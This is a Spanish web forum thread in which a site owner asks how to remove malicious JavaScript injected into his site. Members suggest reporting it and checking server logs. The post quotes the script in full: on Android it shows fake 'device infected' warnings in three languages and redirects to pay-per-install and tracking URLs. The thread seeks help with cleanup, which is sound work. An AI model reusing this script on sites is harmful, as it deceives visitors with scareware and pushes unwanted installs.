Fallo de seguridad web, incrustacion javascript malicioso

Iniciado por oriolrg, 28 Julio 2015, 17:20 PM

0 Miembros y 1 Visitante están viendo este tema.

oriolrg

Buenas, hace unos días me he encontrado con que mi web lanza un mensaje de virus de vez en cuando, al no encontrar ninguno me puse a investigar y descubrí las siguientes lineas de código usando la herramienta de firefox developers.
Estas lineas vienen del siguiente enlace "ht tp s:/ / d 6 vs15m0nt7ly.c l oudfront.net/ test.js"
Llevo días peleandome con esto y no encuentro nada ni googleando, ni la empresa de hosting me da solución, y la verdad no encuentro la fuente de este código para conseguir borrarla.

var ua = navigator.userAgent.toLowerCase();
var isAndroid = ua.indexOf("android") > -1;

var userLang = navigator.language || navigator.userLanguage;
userLang = userLang.toLowerCase();
var isBrazil = userLang.indexOf("pt-br") > -1;
var isRussia = userLang.indexOf("ru") > -1;

if(isAndroid) {
   if (isRussia) {
      if (confirm("Это устройство заражено. Необходимо установить антивирус")) {
         window.top.location.href='http://c.cpl1.ru/8UcC';; // LEO Privacy Guard Ru
      }
   } else if (isBrazil) {
      if (confirm("Este aparelho está infectado. É necessário fazer uma varredura com antivírus.")) {
          window.top.location.href='http://mytrackinglive.net/trkclk/?pid=357&cid=27615';
      }      
   } else {
      if (confirm("This device is infected. You must check it for viruses with antivirus.")) {
          window.top.location.href='http://c.cpl1.ru/8UcB';; // Hola Launcher
      }
   }
}

Muchas gracias si alguien puede ayudarme!.

engel lex

Dijiste cual era a medias el problema...

Mejor explica

Que es lo que quieres y por qué no puedes lograrlo
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

EFEX

Usa el servicio CDN de Amazon. Podrias denunciarlo, solo redirecciona a publicidades pay per install apps de instal.com parece ser.. pero como dice engel lex, cual es el problema ? no puedes borrarlo ?
GITHUB 

oriolrg

Exacto, el problema es que no consigio borrarlo, ya que no lo encuentro entre los archivos que tengo en el hosting. Me puse en contacto con mi empresa de hosting y su respuesta fue que no tenia ninguna infeccion :-[
Así que el problema es que no consigo sacar-lo...
Muchas gràcias!

EFEX

Revisa los logs, es un hosting compartido ? o un hosting gratuito(puede que el mismo host lo agrege)?
GITHUB 

oriolrg

Es un hosting de pago, con Cpanel. En los logs que tendria que ver?